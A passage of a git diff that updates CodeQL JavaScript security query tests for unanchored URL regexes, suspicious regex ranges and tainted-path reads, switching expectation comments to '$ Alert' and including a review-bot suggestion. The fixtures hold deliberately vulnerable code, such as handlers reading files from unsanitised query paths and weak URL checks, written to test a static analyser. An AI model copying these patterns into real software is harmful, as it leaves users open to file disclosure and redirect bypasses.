@@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - 
new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..895707fae0fc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js 
@@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // 
$ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( 
@@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true 
@@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if 
("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js 
@@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; // OK -var tst3 = /[0-90-9]/; // OK +var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; +var tst3 = /[0-90-9]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..2c915a920b16 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -6,6 +6,5 @@ import { join } from 'path'; var server = createServer(function(req, res) { let path = parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..b598cbee74bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js 
@@ -8,63 +8,52 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + // OK - basename is safe 
res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - 
res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { 
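Review bot: The `// OK - basename is safe` and `// OK - extname is safe` comments in the `@@ -8,63 +8,52 @@` hunk are left on their own line above the `res.write(...)` calls, while every other expectation in the same callback was moved onto the statement it describes, so a reader scanning the block finds the OK cases in a different place than the `$ Alert` cases. For consistency I would put them inline as well: `res.write(fs.readFileSync(pathModule.basename(path))); // OK - basename is safe` and `res.write(fs.readFileSync(pathModule.extname(path))); // OK - extname is safe`. Presumably only `$`-prefixed comments are read by the inline-expectations framework, so this is a readability change rather than a behavioural one. The enclosing `http.createServer` callback starts and ends within the hunk.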
@@ -113,36 +102,36 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); 
@@ -150,33 +139,33 @@ var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. - res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + 
res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; 
@@ -184,38 +173,38 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. 
}); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..a3e4028b0daa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -7,6 +7,5 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..93255a7ab518 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js 
@@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Alert - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Alert - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..2c251b8de379 100644 --- 